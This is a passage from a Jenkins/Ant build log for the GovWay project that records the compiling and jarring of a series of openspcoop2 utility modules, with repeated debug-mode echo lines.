/var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-properties_RELEASE.jar 17:48:33 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:36 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:36 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:48:36 [WARNING] [echo] **************************************** 17:48:36 [WARNING] [echo] **** DEBUG MODE ON ***** 17:48:36 [WARNING] [echo] **************************************** 17:48:36 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:48:36 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/jaxb] 17:48:36 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:48:36 [INFO] [javac] Compiling 15 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:37 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-jaxb_RELEASE.jar 17:48:37 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:40 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:40 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:48:40 [WARNING] [echo] **************************************** 17:48:40 [WARNING] [echo] **** DEBUG MODE ON ***** 17:48:40 [WARNING] [echo] **************************************** 17:48:40 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:48:40 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/jaxrs] 17:48:40 [INFO] [javac] Compiling 9 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:40 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-jaxrs_RELEASE.jar 17:48:40 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:44 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:44 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:48:44 [WARNING] [echo] **************************************** 17:48:44 [WARNING] [echo] **** DEBUG MODE ON ***** 17:48:44 [WARNING] [echo] **************************************** 17:48:44 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:48:44 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/xml] 17:48:44 [INFO] [javac] Compiling 41 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:48 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-xml_RELEASE.jar 17:48:48 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:52 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:52 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:48:52 [WARNING] [echo] **************************************** 17:48:52 [WARNING] [echo] **** DEBUG MODE ON ***** 17:48:52 [WARNING] [echo] **************************************** 17:48:52 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:48:52 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/json] 17:48:52 [INFO] [javac] Compiling 22 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:54 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-json_RELEASE.jar 17:48:54 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:57 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:57 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:48:57 [WARNING] [echo] **************************************** 17:48:57 [WARNING] [echo] **** DEBUG MODE ON ***** 17:48:57 [WARNING] [echo] **************************************** 17:48:57 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:48:57 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/xml2json] 17:48:57 [INFO] [javac] Compiling 17 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:48:58 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-xml2json_RELEASE.jar 17:48:58 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:02 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:02 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:49:02 [WARNING] [echo] **************************************** 17:49:02 [WARNING] [echo] **** DEBUG MODE ON ***** 17:49:02 [WARNING] [echo] **************************************** 17:49:02 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:49:02 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/digest] 17:49:02 [INFO] [javac] Compiling 14 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:03 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-digest_RELEASE.jar 17:49:03 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:07 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:07 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:49:07 [WARNING] [echo] **************************************** 17:49:07 [WARNING] [echo] **** DEBUG MODE ON ***** 17:49:07 [WARNING] [echo] **************************************** 17:49:07 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:49:07 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/regexp] 17:49:07 [INFO] [javac] Compiling 7 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:08 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-regexp_RELEASE.jar 17:49:08 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:12 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:12 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:49:12 [WARNING] [echo] **************************************** 17:49:12 [WARNING] [echo] **** DEBUG MODE ON ***** 17:49:12 [WARNING] [echo] **************************************** 17:49:12 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:49:12 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/certificate] 17:49:12 [INFO] [javac] Compiling 46 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:15 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-certificate_RELEASE.jar 17:49:15 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:19 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:19 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:49:19 [WARNING] [echo] **************************************** 17:49:19 [WARNING] [echo] **** DEBUG MODE ON ***** 17:49:19 [WARNING] [echo] **************************************** 17:49:19 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:49:19 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/transport] 17:49:19 [INFO] [javac] Compiling 83 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:22 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-transport_RELEASE.jar 17:49:22 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:26 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:26 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:49:26 [WARNING] [echo] **************************************** 17:49:26 [WARNING] [echo] **** DEBUG MODE ON ***** 17:49:26 [WARNING] [echo] **************************************** 17:49:26 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:49:26 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/certificate/ocsp] 17:49:26 [INFO] [javac] Compiling 18 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:28 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-certificate-ocsp_RELEASE.jar 17:49:28 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:31 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:31 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:49:31 [WARNING] [echo] **************************************** 17:49:31 [WARNING] [echo] **** DEBUG MODE ON ***** 17:49:31 [WARNING] [echo] **************************************** 17:49:31 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:49:31 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/certificate/remote] 17:49:31 [INFO] [javac] Compiling 9 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:32 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-certificate-remote_RELEASE.jar 17:49:32 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:35 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:35 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:49:35 [WARNING] [echo] **************************************** 17:49:35 [WARNING] [echo] **** DEBUG MODE ON ***** 17:49:35 [WARNING] [echo] **************************************** 17:49:35 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:49:35 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/certificate/byok] 17:49:35 [INFO] [javac] Compiling 14 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:37 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-certificate-byok_RELEASE.jar 17:49:37 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:40 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:40 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:49:40 [WARNING] [echo] **************************************** 17:49:40 [WARNING] [echo] **** DEBUG MODE ON ***** 17:49:40 [WARNING] [echo] **************************************** 17:49:40 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:49:40 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/jmx] 17:49:40 [INFO] [javac] Compiling 3 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:41 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-jmx_RELEASE.jar 17:49:41 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:45 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:45 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:49:45 [WARNING] [echo] **************************************** 17:49:45 [WARNING] [echo] **** DEBUG MODE ON ***** 17:49:45 [WARNING] [echo] **************************************** 17:49:45 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:49:45 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/cache] 17:49:45 [INFO] [javac] Compiling 22 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:46 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-cache_RELEASE.jar 17:49:46 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:49 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:49 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:49:49 [WARNING] [echo] **************************************** 17:49:49 [WARNING] [echo] **** DEBUG MODE ON ***** 17:49:49 [WARNING] [echo] **************************************** 17:49:49 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:49:49 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/checksum] 17:49:49 [INFO] [javac] Compiling 3 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:50 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-checksum_RELEASE.jar 17:49:50 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:50 [WARNING] [echo] skipJavaIncompatiblePackages: , ${skipJavaIncompatiblePackageCryptTest} 17:49:54 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:54 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:49:54 [WARNING] [echo] **************************************** 17:49:54 [WARNING] [echo] **** DEBUG MODE ON ***** 17:49:54 [WARNING] [echo] **************************************** 17:49:54 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:49:54 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/crypt] 17:49:54 [INFO] [javac] Compiling 23 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:55 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-crypt_RELEASE.jar 17:49:55 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:59 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:49:59 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:49:59 [WARNING] [echo] **************************************** 17:49:59 [WARNING] [echo] **** DEBUG MODE ON ***** 17:49:59 [WARNING] [echo] **************************************** 17:49:59 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:49:59 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/csv] 17:49:59 [INFO] [javac] Compiling 10 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:00 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-csv_RELEASE.jar 17:50:00 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:03 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:03 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:50:03 [WARNING] [echo] **************************************** 17:50:03 [WARNING] [echo] **** DEBUG MODE ON ***** 17:50:03 [WARNING] [echo] **************************************** 17:50:03 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:50:03 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/dch] 17:50:03 [INFO] [javac] Compiling 3 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:04 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-dch_RELEASE.jar 17:50:04 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:08 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:08 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:50:08 [WARNING] [echo] **************************************** 17:50:08 [WARNING] [echo] **** DEBUG MODE ON ***** 17:50:08 [WARNING] [echo] **************************************** 17:50:08 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:50:08 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/sql] 17:50:08 [INFO] [javac] Compiling 21 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:10 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-sql_RELEASE.jar 17:50:10 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:14 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:14 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:50:14 [WARNING] [echo] **************************************** 17:50:14 [WARNING] [echo] **** DEBUG MODE ON ***** 17:50:14 [WARNING] [echo] **************************************** 17:50:14 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:50:14 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/jdbc] 17:50:14 [INFO] [javac] Compiling 37 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:15 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-jdbc_RELEASE.jar 17:50:15 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:19 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:19 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:50:19 [WARNING] [echo] **************************************** 17:50:19 [WARNING] [echo] **** DEBUG MODE ON ***** 17:50:19 [WARNING] [echo] **************************************** 17:50:19 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:50:19 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/id] 17:50:19 [INFO] [javac] Compiling 45 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:20 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-id_RELEASE.jar 17:50:20 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:23 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:23 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:50:23 [WARNING] [echo] **************************************** 17:50:23 [WARNING] [echo] **** DEBUG MODE ON ***** 17:50:23 [WARNING] [echo] **************************************** 17:50:23 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:50:23 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/serialization] 17:50:23 [INFO] [javac] Compiling 18 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:25 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-serialization_RELEASE.jar 17:50:25 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:30 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:30 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:50:30 [WARNING] [echo] **************************************** 17:50:30 [WARNING] [echo] **** DEBUG MODE ON ***** 17:50:30 [WARNING] [echo] **************************************** 17:50:30 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:50:30 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/logger] 17:50:30 [INFO] [javac] Compiling 77 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:32 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-logger_RELEASE.jar 17:50:32 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:32 [WARNING] [echo] skipJavaIncompatiblePackages: 17:50:37 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:37 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:50:37 [WARNING] [echo] **************************************** 17:50:37 [WARNING] [echo] **** DEBUG MODE ON ***** 17:50:37 [WARNING] [echo] **************************************** 17:50:37 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:50:37 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/service] 17:50:37 [INFO] [javac] Compiling 110 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:40 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-service_RELEASE.jar 17:50:41 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:46 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:46 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:50:46 [WARNING] [echo] **************************************** 17:50:46 [WARNING] [echo] **** DEBUG MODE ON ***** 17:50:46 [WARNING] [echo] **************************************** 17:50:46 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:50:46 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/beans] 17:50:46 [INFO] [javac] Compiling 5 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:47 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-beans_RELEASE.jar 17:50:47 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:50 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:50 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:50:50 [WARNING] [echo] **************************************** 17:50:50 [WARNING] [echo] **** DEBUG MODE ON ***** 17:50:50 [WARNING] [echo] **************************************** 17:50:50 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:50:50 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/security] 17:50:50 [INFO] [javac] Compiling 41 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:52 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-security_RELEASE.jar 17:50:52 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:57 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:57 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:50:57 [WARNING] [echo] **************************************** 17:50:57 [WARNING] [echo] **** DEBUG MODE ON ***** 17:50:57 [WARNING] [echo] **************************************** 17:50:57 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:50:57 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/pdf] 17:50:57 [INFO] [javac] Compiling 11 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:50:58 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-pdf_RELEASE.jar 17:50:58 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:03 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:03 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:51:03 [WARNING] [echo] **************************************** 17:51:03 [WARNING] [echo] **** DEBUG MODE ON ***** 17:51:03 [WARNING] [echo] **************************************** 17:51:03 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:51:03 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/wsdl] 17:51:03 [INFO] [javac] Compiling 3 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:04 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-wsdl_RELEASE.jar 17:51:04 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:08 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:08 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:51:08 [WARNING] [echo] **************************************** 17:51:08 [WARNING] [echo] **** DEBUG MODE ON ***** 17:51:08 [WARNING] [echo] **************************************** 17:51:08 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:51:08 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/rest] 17:51:08 [INFO] [javac] Compiling 54 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:09 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-rest_RELEASE.jar 17:51:10 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:10 [WARNING] [echo] skipJavaIncompatiblePackages: 17:51:13 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:13 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:51:13 [WARNING] [echo] **************************************** 17:51:13 [WARNING] [echo] **** DEBUG MODE ON ***** 17:51:13 [WARNING] [echo] **************************************** 17:51:13 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:51:13 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/openapi] 17:51:13 [INFO] [javac] Compiling 27 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:15 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-openapi_RELEASE.jar 17:51:15 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:18 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:18 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:51:18 [WARNING] [echo] **************************************** 17:51:18 [WARNING] [echo] **** DEBUG MODE ON ***** 17:51:18 [WARNING] [echo] **************************************** 17:51:18 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:51:18 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/xacml] 17:51:18 [INFO] [javac] Compiling 8 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:19 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-xacml_RELEASE.jar 17:51:19 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:22 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:22 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:51:22 [WARNING] [echo] **************************************** 17:51:22 [WARNING] [echo] **** DEBUG MODE ON ***** 17:51:22 [WARNING] [echo] **************************************** 17:51:22 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:51:22 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/tools/utils/src/org/openspcoop2/utils/mail] 17:51:22 [INFO] [javac] Compiling 10 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:23 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/utils/openspcoop2_utils-mail_RELEASE.jar 17:51:23 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:51:27 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 